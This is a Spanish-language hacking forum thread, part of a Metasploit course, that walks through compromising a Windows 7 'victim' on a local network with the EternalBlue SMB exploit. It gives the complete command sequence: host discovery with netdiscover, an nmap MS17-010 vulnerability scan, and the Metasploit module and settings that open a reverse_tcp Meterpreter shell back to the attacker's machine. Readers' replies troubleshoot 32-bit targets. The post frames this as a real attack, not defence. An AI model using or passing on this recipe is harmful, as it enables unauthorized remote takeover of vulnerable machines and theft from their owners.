Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

  • 3 Respuestas
  • 5594 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado puntoCL

  • *
  • Moderator
  • *****
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil


En esta tercer parte vamos a conseguir un meterpreter con el famoso exploit ETERNALBLUE.

Dejare esto dos conceptos para que se entienda un poco mas.

SMB: Es un protocolo de red que permite compartir archivos, impresoras, etcétera, entre nodos de una red que usan sistema operativo Windows

CVE: Common Vulnerabilities and Exposures, “Vulnerabilidades y exposiciones comunes” Este es un estándar para nombrar vulnerabilidades de seguridad. CVE-YYYY-NNNN YYYY indica el año y NNNN indica el número de la vulnerabililocal.

ETERNALBLUE: Es un exploit de una vulnerabilidad del protocolo (SMB). Esta vulnerabilidad se indica mediante como CVE-2017-0144. Esta vulnerabilidad existe porque el servidor SMB versión 1 (SMBv1) maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario.

El 8 de abril del 2017, TheShadowBroker público una gran arsenal de herramientas de hacking de la NSA. Lo cual lo puedes ver en GitHub


Este exploit solo ataca a sistema operativos Windows 7 y Windows server 2008. Lo extraordinario de este exploit es que no se necesita enviar un tipio de archivo “PAYLOAD” y espera que la víctima lo ejecute y pensar como engañar a la víctima con ingeniera social  para que ejecute dicho archivo, Bueno con este exploit es totalmente lo contrario no necesitas crear nada, solo necesita configurar algunos parámetros básicos y tendrás el control total de una máquina.

Estare simulando un ataque real.

Primero tenemos que identificar la víctima y para eso tenemos que ver que máquinas están conectado en nuestra red y para eso ocuparemos una herramienta que busque host vivos. Con la herramienta NETDISCOVER



Esta herramienta básicamente lo que hace es detectar los host que están conectado en nuestra red, Esta herramienta hace su búsqueda por medio de peticiones ARP.

Código: [Seleccionar]
netdiscover -i wlan0 -r 192.168.0.0/24
-i = La interfaz de red que estaremos utilizando, para ver nuestra interfaz ocupe ifconfig.

-r = El rango del escaneo.

Y como resultado no aparecerán todos los host conectado.



Como podrán ver tengo tres host:

192.168.0.1: sería el router
192.168.0.100: Maquina de la víctima
192.168.0.102: Un celular.

Ya una vez identificada la victima que sería la IP 192.168.0.100 por lo cual tenemos que saber si esa máquina es vulnerable o no, por lo cual ocuparemos nmap esta herramienta tiene script para escanear vulnerabilidades. El script que estaremos utilizando --script smb-vuln-ms17-010.nse y a la vez veremos qué sistema operativo es la máquina de la victima.

Código: [Seleccionar]
nmap -sC -sV -p 445 --script smb-vuln-ms17-010.nse 192.168.0.100
Y no aparecerá esto.



Como podemos ver el resultado nos dice que es un Windows 7 y que el equipo es VULNERABLE. Ahora nos queda ejecutar nuestro metasploit y buscar enternablue, para eso ocuparemos el comando search.

Código: [Seleccionar]
search eternablue


Nos aparecerá dos módulos que sería el auxiliar que es lo mismo que hicimos en nmap para identificar si la máquina de la víctima es vulnerable. Y el otro modulo es el exploit.

Para ingresar al módulo del exploit de enternablue se ocupar el comando use

Código: [Seleccionar]
use exploit/windows/smb/ms17_010_eternalblue


Ahora nos falta setear y colocaremos la IP de nuestra victima

Código: [Seleccionar]
set RHOST 192.168.0.100
Ahora crearemos un payload para obtener el meterpreter. Si nosotros no creamos el payload al momento de atacar como resultado obtendremos el cmd de la máquina de la víctima y en cambio sí obtenernos un meterpreter podemos hacer un fin de cosas como descarga archivo, subir archivos, capturar pantalla, etc….

Código: [Seleccionar]
set payload windows/x64/meterpreter/reverse_tcp
Y por finalizar nos queda LHOST que sería la IP de nuestra máquina. Con el comando ifconfig sabremos cual es nuestra IP.



En mi caso la IP que tengo seria 192.168.0.101   

Código: [Seleccionar]
set LHOST 192.168.0.101
Escribimos show options    



Ahora nos falta ejecutar para eso escribimos:   

Código: [Seleccionar]
exploit
Y listo nuestro exploit se estará ejecutado y obtendremos el meterpreter que tanto deseamos.



Para finalizar el post si escriben help podrán ver todo el comando del meterpreter. El siguiente post estaré hablado todo el comando de meterpreter.


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom

« Última modificación: Abril 13, 2018, 08:48:18 pm por puntoCL »




Desconectado edwinosky

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
si la pc de la victima es de arquitectura 32 bits como seria ya que eternnablue como modulo de metasploit solo soporta maquinas 64 bits

Desconectado coke951

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
  • Skype: Cok3951
    • Ver Perfil
He investigado un poco para hacer la prueba en una maquina virtual x86 pero no he tenido exito... lleve a cabo este procedimiento: https://creadpag.com/acceso-a-windows-7-con-eternalblue-desde-metasploit-con-kali-linux/

Al final no obtengo ningun error pero tampoco me da la sesión.


He investigado un poco y encontre estos enlaces.
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/9
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/17
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/38

Pero no he dado con la solución a mi problema.
He comprobado que esta deshabilitado el firewall y no tengo antivirus.

Desconectado Kyxda

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
 Yo en la parte de "maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario" he alucinado pepinillos sinceramente.

 

Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 3650
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
¿Cómo eché a la gente de mi red WiFi para aumentar mi velocidad de internet?

Iniciado por puntoCL

Respuestas: 6
Vistas: 2421
Último mensaje Septiembre 24, 2019, 09:56:53 pm
por efrainvaldivieso
[GUIA]Como protegerse del doxing y proteger tu informacion personal en telegram

Iniciado por Psico

Respuestas: 5
Vistas: 2397
Último mensaje Julio 07, 2019, 07:05:50 am
por hielasangre
Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 24
Vistas: 28905
Último mensaje Junio 29, 2019, 10:40:59 pm
por Psico
Como controlar el trafico aereo gracias al hacking de buscadores

Iniciado por Rootkit_Pentester

Respuestas: 7
Vistas: 5573
Último mensaje Abril 22, 2017, 04:38:16 pm
por GotKiller_22